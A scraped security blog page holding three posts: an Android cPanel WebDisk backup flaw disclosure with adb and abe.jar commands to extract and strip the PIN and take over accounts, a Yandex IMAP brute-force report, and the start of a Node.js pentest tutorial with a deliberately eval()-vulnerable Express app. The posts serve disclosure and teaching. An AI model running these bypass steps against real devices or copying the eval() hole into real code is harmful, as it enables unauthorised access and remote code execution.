<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
First below was my Test Environment </div>
<div class="separator" style="clear: both; text-align: left;">
App Name & Version = cPanel WebDisk Android Application Version 4.0 </div>
<div class="separator" style="clear: both; text-align: left;">
Tested On = Android 5.0 (Non Rooted Device+Rooted)</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
cPanel WebDisk Android Application have functionality to create a Pin Code to prevent unauthorised access. It can be found in Application>Settings> Passcode Lock. (We can see in below snap shot)</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhlsHl5KA1I1jD3EDNMbPXPTT1ZlSxqsR4-SAvHZUmfbEpyNGXJ1q5xG9H5_tbwpFDLSKZV2NQa9R3RS07o6dUNz0KVgRARw9CoSaF0Pnk4TtYidCXxwXKFpsEz46JQkaqvqD1MpVr25mc/s1600/Screen+Shot+2017-09-05+at+4.19.51+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="631" data-original-width="429" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhlsHl5KA1I1jD3EDNMbPXPTT1ZlSxqsR4-SAvHZUmfbEpyNGXJ1q5xG9H5_tbwpFDLSKZV2NQa9R3RS07o6dUNz0KVgRARw9CoSaF0Pnk4TtYidCXxwXKFpsEz46JQkaqvqD1MpVr25mc/s320/Screen+Shot+2017-09-05+at+4.19.51+PM.png" width="217" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
After enabling it, cPanel WebDisk Android Application will ask you for PassCode every time you exit the application.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg6FK5eJbFOXYzEU2bsVRW5OblFzNMrQzAFp6vEjyCz9QlpWKnj93alNHPffEmaedz4L8tQkSyfuuVe7bmwOPxTApCz81HjR3pnSuAAcI_VkFjTyg-tN81BMJOyKV-kWcht1OZ5PBWvSco/s1600/Screen+Shot+2017-09-05+at+4.13.18+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="655" data-original-width="426" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg6FK5eJbFOXYzEU2bsVRW5OblFzNMrQzAFp6vEjyCz9QlpWKnj93alNHPffEmaedz4L8tQkSyfuuVe7bmwOPxTApCz81HjR3pnSuAAcI_VkFjTyg-tN81BMJOyKV-kWcht1OZ5PBWvSco/s320/Screen+Shot+2017-09-05+at+4.13.18+PM.png" width="208" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Vulnerability Details:</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
In android there is a property called "Backup" which allow application to be backup by any other application or by self. This property can be declared in AndroidManifest.xml ex. <b>allowBackup="true"</b>.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
So if the AndroidManifest.xml <b>allowBackup="true" </b>That means application cab be backup, The same condition is exists in cPanel WebDisk Android App. </div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
First I backup the application using adb backup androidpackage -f outfile.ab</div>
<div class="separator" style="clear: both; text-align: left;">
<b>adb backup net.cpanel.webdisk -f disk.ab </b>After executing this command your device will ask you for Back Data Option as below. So hit Back My Data</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiXeX_pnIK85mXBC9J0Vm9wz1I6vYt9GH4rC-hYDL8rZ1z4VezDeq18K3FG7QknAGE_wuwWILGYB2jrPS8M3yUMkaLeUNv4dQBNbHHL9Aexa8hk4QtHRkec1cIjRxZobnpTNr0kadhRixo/s1600/Screen+Shot+2017-09-05+at+3.41.55+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="759" data-original-width="1280" height="378" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiXeX_pnIK85mXBC9J0Vm9wz1I6vYt9GH4rC-hYDL8rZ1z4VezDeq18K3FG7QknAGE_wuwWILGYB2jrPS8M3yUMkaLeUNv4dQBNbHHL9Aexa8hk4QtHRkec1cIjRxZobnpTNr0kadhRixo/s640/Screen+Shot+2017-09-05+at+3.41.55+PM.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
This has created file called "disk.ab". Now I converted to backup file into compressed tar file using command</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<b>java -jar abe.jar unpack disk.ab disk.tar</b> - If you are using windows machine then run cmd.exe as Administrator.</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgXKtomyTs-V99dx1x2TFoj8Q7TIGyW6YvXBMVsZiU2is6qxRMKacAj00zVWtRMcC3WVv0iZ-Gn7qzmBV2hzJY0FdU2Rus7yOnjZIgo9oIZ29sMTjOpYkGc4RtNUlVYOpFlnQ9pONFGcO0/s1600/tar.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="49" data-original-width="692" height="44" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgXKtomyTs-V99dx1x2TFoj8Q7TIGyW6YvXBMVsZiU2is6qxRMKacAj00zVWtRMcC3WVv0iZ-Gn7qzmBV2hzJY0FdU2Rus7yOnjZIgo9oIZ29sMTjOpYkGc4RtNUlVYOpFlnQ9pONFGcO0/s640/tar.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
This command created a tar file (disk.tar), Later on I extracted this tar file using below command</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<b>tar xvf disk.tar </b>This process created a new folder called "apps" which contents all backup of "cPanel WebDisk Android App". </div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiOWPCV6LUtxvSEaZGePTjzw7O4WeQa9vRD3y8M718330YL7DUE7koLb9UdpGiqY8pGCTXmnA377A45HWpyuHc6THaJjci2dQ3CGmVSDrAN-5V1O7I-cXLDVm5BpQxq2toLQDk7oLNDDFY/s1600/compress.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="620" data-original-width="1280" height="310" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiOWPCV6LUtxvSEaZGePTjzw7O4WeQa9vRD3y8M718330YL7DUE7koLb9UdpGiqY8pGCTXmnA377A45HWpyuHc6THaJjci2dQ3CGmVSDrAN-5V1O7I-cXLDVm5BpQxq2toLQDk7oLNDDFY/s640/compress.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Finally I moved to "/apps/net.cpanel.webdisk/sp" folder and found a file "net.cpanel.webdisk_preferences.xml" which contents the PassCode Value which was "1337".</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi4TkRgFYyQ7wpOpTn2rslCdKRA7KOGN8KG_1qnPi6bXsTytVx2oOJYxjcswTc9ZHf5Djvlq-J5i5zGxSQ7pCTPeAqqaBXCHM9e4fzA3tYGq0KUMpceBfEtFJIOQoExeP0IvTqjAjV9waY/s1600/pin.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="653" data-original-width="1015" height="410" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi4TkRgFYyQ7wpOpTn2rslCdKRA7KOGN8KG_1qnPi6bXsTytVx2oOJYxjcswTc9ZHf5Djvlq-J5i5zGxSQ7pCTPeAqqaBXCHM9e4fzA3tYGq0KUMpceBfEtFJIOQoExeP0IvTqjAjV9waY/s640/pin.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Using this PassCode I was able to get the DashBoard of the application.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEit6LAu3Z5DSFJrra2W4YsQgxerAO3UYsUPJhCeozumFGQ_TCeh8te_PQbQfizWUIKODRoa4ZHcomcVHzt2EFKHkONv7ZnpyW8hb3134XPE3J7daAZtf3VQzOrQB9bJ5gns28vo1jbaMnM/s1600/dash.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="660" data-original-width="428" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEit6LAu3Z5DSFJrra2W4YsQgxerAO3UYsUPJhCeozumFGQ_TCeh8te_PQbQfizWUIKODRoa4ZHcomcVHzt2EFKHkONv7ZnpyW8hb3134XPE3J7daAZtf3VQzOrQB9bJ5gns28vo1jbaMnM/s320/dash.png" width="207" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
POC Video </div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div style="text-align: center;">
<iframe allowfullscreen="" class="YOUTUBE-iframe-video" data-thumbnail-src="https://i.ytimg.com/vi/BMwccCxaR2U/0.jpg" frameborder="0" height="266" src="https://www.youtube.com/embed/BMwccCxaR2U?feature=player_embedded" width="320"></iframe></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
You can download this Version APK from here for reproducing the issue- <a href="https://drive.google.com/file/d/0B-LjC3oY6tUpQU9vS1hBM1ZRSWc/view?usp=sharing">https://drive.google.com/file/d/0B-LjC3oY6tUpQU9vS1hBM1ZRSWc/view?usp=sharing</a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<b><span style="color: #a64d79;">Little Interesting Points</span></b></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="color: #990000;">If this scenario the PIN code was saved as clear text format, so you can enter it in the application. But what happened if the PIN code is stored in encryption format ! </span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="color: #990000;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
1) So in this condition you can remove the <whole block of pincode> , you can replace the code with any garbage value & If you able to reverse the application then just do a quick look on encryption technique being used & replace the pincodevalue with your own value from preference.xml file and then saved it. Finally you have an xml file without PIN Lock Code value right.Later on you can perform below </div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
2) <b>tar -tf disk.tar > disk.list </b></div>
<div class="separator" style="clear: both; text-align: left;">
3) <b>star -c -v -f disk_new.tar -no-dirslash list=disk.list</b></div>
<div class="separator" style="clear: both; text-align: left;">
4) <b>java -jar abe.jar pack disk_new.tar disk_new.ab </b></div>
<div class="separator" style="clear: both; text-align: left;">
5) <b>adb restore disk_new.ab (</b>This command will prompt on your device to restore the backup as respect to that application)</div>
<div class="separator" style="clear: both; text-align: left;">
<span style="color: #990000;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="color: #990000;">In all 5 steps, we have simply remove the PIN Code block from the xml and re-pack it as android backup file and finally we restore that backup into the device. Now if all works well you will get application dashboard/home screen access without prompting for any Pass Code.</span></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="color: #990000;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="color: #990000;">Some times, Backup also expose the API access token & some interesting points as well of the user just in case if the application is protected by any Authentication Lock functionality. You can get the API Access token and make calls on behalf of the user.</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="color: #990000;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="color: blue;">One of the scenario I encounter with is, the application was doing some authentication from internal storage database for user authentication. So once we backup the application and looked into the DB file, we found some session management data. To verify my doubt we just changed the value of username with victimusername and restore the backup. </span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="color: blue;">Once the devices is restarted, we accessed the application and found our self into the victim account. </span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="color: blue;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="color: blue;">As we can see we have tons of scenarios where we can exploit this functionality.</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="color: blue;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="color: blue;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="color: blue;">Permission is taken from cPanel Security Team for public disclosure.</span></div>
<div class="separator" style="clear: both; text-align: left;">
<b><br /></b></div>
<div class="separator" style="clear: both; text-align: left;">
Comments are always welcome. </div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
</div>
Narendra Bhatihttp://www.blogger.com/profile/07150714543762295098noreply@blogger.com0tag:blogger.com,1999:blog-3462277729309057123.post-73463533275045716232017-09-26T22:59:00.000+05:302017-09-26T23:01:03.874+05:30Yandex IMAP Brute Forcing(No Rate Limit For Login Attempts)<div dir="ltr" style="text-align: left;" trbidi="on">
Hello Guyzssss,<br />
<div>
<br /></div>
<div>
I am not in bug bounty so much, But while using one of the yandex service, I found that there was no Rate Limit Deployed for login attempts on their IMAP Authentication.</div>
<div>
<br /></div>
<div>
Means user can perform multiple attempts on their IMAP Service, Which is responsible to access yandex mail on other accounts.Just like others.</div>
<div>
<br /></div>
<div>
Like gmail users can import yandex emails(Account) using IMAP Authentication.<br />
<a name='more'></a></div>
<div>
<br /></div>
<div style="text-align: center;">
POC</div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
1) Intercepted request(parameters) for adding yandex as imap authentication from 3rd party website.</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiWv0rzqRx1q8YaPctrea5Z5oQmFtaef-QBsSU8E7BVm89rc8xtFeDbi5RqHRXcza2ybnNKs7EQvzs8WQQ7wyTqmiQVkaVkg_hE1aIqlbsFpESRWm3z7h1am5o1CtwH94X9_53vgySQF88/s1600/1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="66" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiWv0rzqRx1q8YaPctrea5Z5oQmFtaef-QBsSU8E7BVm89rc8xtFeDbi5RqHRXcza2ybnNKs7EQvzs8WQQ7wyTqmiQVkaVkg_hE1aIqlbsFpESRWm3z7h1am5o1CtwH94X9_53vgySQF88/s640/1.png" width="640" /></a></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
2) Setup some payloads with one valid password</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiBIw7E4J8J9YhTVM7xrFovaPU5p_DsjuFVIfncrtB3kbD_-Nvb7RUZgvbhAxkULO0fvbTTseplqFVwnRKrXjiank7w28gwkjCxjQs7eCUP7TNhOW605WfEn_hWoILBKyzD5zuKepCtI-Q/s1600/2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="263" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiBIw7E4J8J9YhTVM7xrFovaPU5p_DsjuFVIfncrtB3kbD_-Nvb7RUZgvbhAxkULO0fvbTTseplqFVwnRKrXjiank7w28gwkjCxjQs7eCUP7TNhOW605WfEn_hWoILBKyzD5zuKepCtI-Q/s400/2.png" width="400" /></a></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
3) Intruder attack( Difference between valid and invalid password attempt</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEieMs_kBqT_lhZDi7YSkTrj857uDNfDhBxK_TRCMfHwXFEMe0_im1Pyov6RP95KnZoq6jFudZWwAm5mnACSOB0oLMuPGltimd3tYjHjRtySMGxW5V0MVHvsxgXklwIDxTc7HjNyn6T4ukE/s1600/3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="206" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEieMs_kBqT_lhZDi7YSkTrj857uDNfDhBxK_TRCMfHwXFEMe0_im1Pyov6RP95KnZoq6jFudZWwAm5mnACSOB0oLMuPGltimd3tYjHjRtySMGxW5V0MVHvsxgXklwIDxTc7HjNyn6T4ukE/s640/3.png" width="640" /></a></div>
<div style="text-align: center;">
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div style="text-align: center;">
Issue was acknowledge by Yandex Security Team.</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg_dR65RPo11WlvyGavr-KZ2_4vewYW0JxIPLDfdOo_vbEuPoJuAk1THfqaAPgawmddE9BHgtMDdoDf6GtVdLn7tyyaBFvHUPw2bCDC8JC2GxTJL1qfRlLQIj7HvRLg-twItTqxlQIt7s8/s1600/yandex+mail.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="244" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg_dR65RPo11WlvyGavr-KZ2_4vewYW0JxIPLDfdOo_vbEuPoJuAk1THfqaAPgawmddE9BHgtMDdoDf6GtVdLn7tyyaBFvHUPw2bCDC8JC2GxTJL1qfRlLQIj7HvRLg-twItTqxlQIt7s8/s640/yandex+mail.PNG" width="640" /></a></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<br /></div>
<div>
<br /></div>
</div>
Narendra Bhatihttp://www.blogger.com/profile/15834240919754131768noreply@blogger.com0tag:blogger.com,1999:blog-3462277729309057123.post-43994962762281227832017-04-23T19:19:00.000+05:302017-04-23T19:23:23.766+05:30Pentesting Node.js Application : Nodejs Application Security<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhkGjowmm5lIjqYSF0kGrxq6cQzz3LP1SPDMmIRpMaszz1hN26E7g67G9DNiq52N7rCUqHZdaqODq8hk9qbMMtiVesZ1xpYlTojdVo_1fbVUBzEqpmkaLfwzhWOvRQ2Gj3FVPuJXkbrEPw/s1600/nodejs_logo_green.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="274" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhkGjowmm5lIjqYSF0kGrxq6cQzz3LP1SPDMmIRpMaszz1hN26E7g67G9DNiq52N7rCUqHZdaqODq8hk9qbMMtiVesZ1xpYlTojdVo_1fbVUBzEqpmkaLfwzhWOvRQ2Gj3FVPuJXkbrEPw/s640/nodejs_logo_green.jpg" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<h2 style="clear: both; text-align: center;">
Pentesting Node.js Application : Nodejs Application Security</h2>
<div class="separator" style="clear: both; text-align: left;">
Hello folks, Today we will see how we can do Pentesting Of NodeJS Application : Attacking NodeJS Application.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
As we know that Javascript is a very common and important language and also a light wight which do our most of task very easily.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
But we also know that, Great efficiency comes with great risk. Node JS is a kind of server side programming language derived from JS.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
According to <a href="https://en.wikipedia.org/wiki/Node.js" target="_blank">Wiki</a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Node.js is an open-source, cross-platform JavaScript run-time environment for executing JavaScript code server-side. Historically, JavaScript was used primarily for client-side scripting, in which scripts written in JavaScript are embedded in a webpage's HTML, to be run client-side by a JavaScript engine in the user's web browser. Node.js enables JavaScript to be used for server-side scripting, and runs scripts server-side to produce dynamic web page content before the page is sent to the user's web browser. Consequently, Node.js has become one of the foundational elements of the "JavaScript everywhere" paradigm,[4] allowing web application development to unify around a single programming language, rather than rely on a different language for writing server side scripts.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Today we will see some of the vulnerabilities which can be exploited in Node.JS application. We will also take a look on the source code for better understanding.</div>
<a name='more'></a><br />
<div class="separator" style="clear: both; text-align: left;">
1) You can install Node.JS on your own using Node.JS easily installation process from here -<a href="https://nodejs.org/en/download/">https://nodejs.org/en/download/</a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
2) In our demo i have used express framework for Node.JS, You can install the same in your PC</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
A) create a directory to where your application code is placed and make that your working directory.</div>
<div class="separator" style="clear: both; text-align: left;">
$ mkdir nodeapp</div>
<div class="separator" style="clear: both; text-align: left;">
$ cd nodeapp</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
2) npm init command to create a package.json file for your application</div>
<div class="separator" style="clear: both; text-align: left;">
$ npm init</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEisI8CzcErSRxgp6Meq1FnHqmZUPJb12rIcW0T-j6GGzorkGbyyU0TfoHYhgPgUC4WoEwGtymPKG4unwIavnwnYBH-EehkWrvF0HQoXhyIjvQnQ5KU1bh9lv4l2jnqgm6dP_tfhNpgVT0k/s1600/Screen+Shot+2017-04-23+at+12.57.44+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="362" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEisI8CzcErSRxgp6Meq1FnHqmZUPJb12rIcW0T-j6GGzorkGbyyU0TfoHYhgPgUC4WoEwGtymPKG4unwIavnwnYBH-EehkWrvF0HQoXhyIjvQnQ5KU1bh9lv4l2jnqgm6dP_tfhNpgVT0k/s640/Screen+Shot+2017-04-23+at+12.57.44+PM.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<br />
3) This command will ask you for a several of things like as the name and version of your application. You can inter the details or keep them as it is by pressing enter in every prompt.<br />
<br />
4) Now install Express in the nodeapp directory<br />
$ npm install express --save<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhZ-MEf74pkCLnxtSXQOgP3flRZXOtFCpc-LsJgIKeBTlSMIbW1jMJCVBtDwuxpebgjLzGe6C1PcNf4ACIxXR6R2HL-f6yX-4dV8KmvOLj7_Pl09wptV-iW_X7N59slM5aUTpxUcqsjbGU/s1600/Screen+Shot+2017-04-23+at+12.58.11+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="310" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhZ-MEf74pkCLnxtSXQOgP3flRZXOtFCpc-LsJgIKeBTlSMIbW1jMJCVBtDwuxpebgjLzGe6C1PcNf4ACIxXR6R2HL-f6yX-4dV8KmvOLj7_Pl09wptV-iW_X7N59slM5aUTpxUcqsjbGU/s640/Screen+Shot+2017-04-23+at+12.58.11+PM.png" width="640" /></a></div>
<br />
<br />
5) You can install Express temporarily and not add it to the dependencies list, omit the --save option:<br />
$ npm install express<br />
<br />
<div style="text-align: center;">
<b>Pentesting Node.js Application : Nodejs Application Security</b><br />
<b><br /></b></div>
<div style="text-align: left;">
<b>1) Eval() Very Evil </b></div>
<div style="text-align: left;">
<b><br /></b></div>
<div style="text-align: left;">
<b>A) Remote Code Execution ( Exploiting Server Side JavaScript Injection ) [ JavaScript Arbitrary Code Execution ]</b></div>
<div style="text-align: left;">
<b><br /></b></div>
<div style="text-align: left;">
eval() is a dangerous/risky function, which execute the codes passed via any input to eval(). Its a kind of Remote Command Execution scenario where an application could perform command execution with its own privilege user.</div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
Ex.-1</div>
<b>var x = 2;</b><br />
<b>var y = 2;</b><br />
<b>var z = '10'';</b><br />
<b>eval('x + y + 6'); // returns 10</b><br />
<b>eval(z); // returns 10</b><br />
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
Both <b>eval() </b>will return value 10.</div>
<div style="text-align: left;">
<br /></div>
Ex. -2<br />
<br />
var express = require('express');<br />
var app = express();<br />
app.get('/', function(req, res) {<br />
<span class="Apple-tab-span" style="white-space: pre;"> </span>var resp=<span style="color: red;">eval</span>("("+req.query.<span style="color: red;">input</span>+")");<br />
<span class="Apple-tab-span" style="white-space: pre;"> </span>res.send('Output</br>'+<span style="color: red;">resp</span>);<br />
});<br />
app.listen(8001);<br />
<div>
<br /></div>
<div>
<b>[codeexe.js]</b></div>
<div class="separator" style="clear: both; text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjwI-JNou5Xkr14OLwgUDxdZTWx831vU_DLumCeaRQxYn2u-tONy-gCYxg1pjlArAMAjAY3L3ub1ZC0UHS6pBZhoaWaCW1L1yj4sfN9SviEDaGfL47nHU0ORInMZlz2JReY85GjqWR4lG8/s1600/Screen+Shot+2017-04-23+at+1.12.43+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="171" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjwI-JNou5Xkr14OLwgUDxdZTWx831vU_DLumCeaRQxYn2u-tONy-gCYxg1pjlArAMAjAY3L3ub1ZC0UHS6pBZhoaWaCW1L1yj4sfN9SviEDaGfL47nHU0ORInMZlz2JReY85GjqWR4lG8/s320/Screen+Shot+2017-04-23+at+1.12.43+PM.png" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
As we can see, clearly the <b>eval</b> function is taking input from <b>input </b>parameter without escaping or filtering the user input which directly getting passed to eval(). Its a very common and typical example function.</div>
<div class="separator" style="clear: both; text-align: left;">
An user can exploit this vulnerability by passing codes to the <b>input </b>parameter.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
First we started our js code by </div>
<div class="separator" style="clear: both; text-align: left;">
<b>node filename.js</b></div>
<div class="separator" style="clear: both; text-align: left;">
<b>node codexe.js</b></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjMJzljAsR59ztAoi3UCe1eliwa2R-dhns-AxrUGJ2ohrlx7qXkhat0DlGF4Xse0gD3buzTMlMDcNrmFYu16qJ01FDKnTh1zfUN9nP299NOxnXbiCExec6MW57QHRLp0PmyK7KeTGf5CY0/s1600/Screen+Shot+2017-04-23+at+1.36.21+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="26" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjMJzljAsR59ztAoi3UCe1eliwa2R-dhns-AxrUGJ2ohrlx7qXkhat0DlGF4Xse0gD3buzTMlMDcNrmFYu16qJ01FDKnTh1zfUN9nP299NOxnXbiCExec6MW57QHRLp0PmyK7KeTGf5CY0/s640/Screen+Shot+2017-04-23+at+1.36.21+PM.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div>
If you see any error while starting this codes, so it might possible that another service is running on the same port. So first you have the find the service using <b>ps </b>command.</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
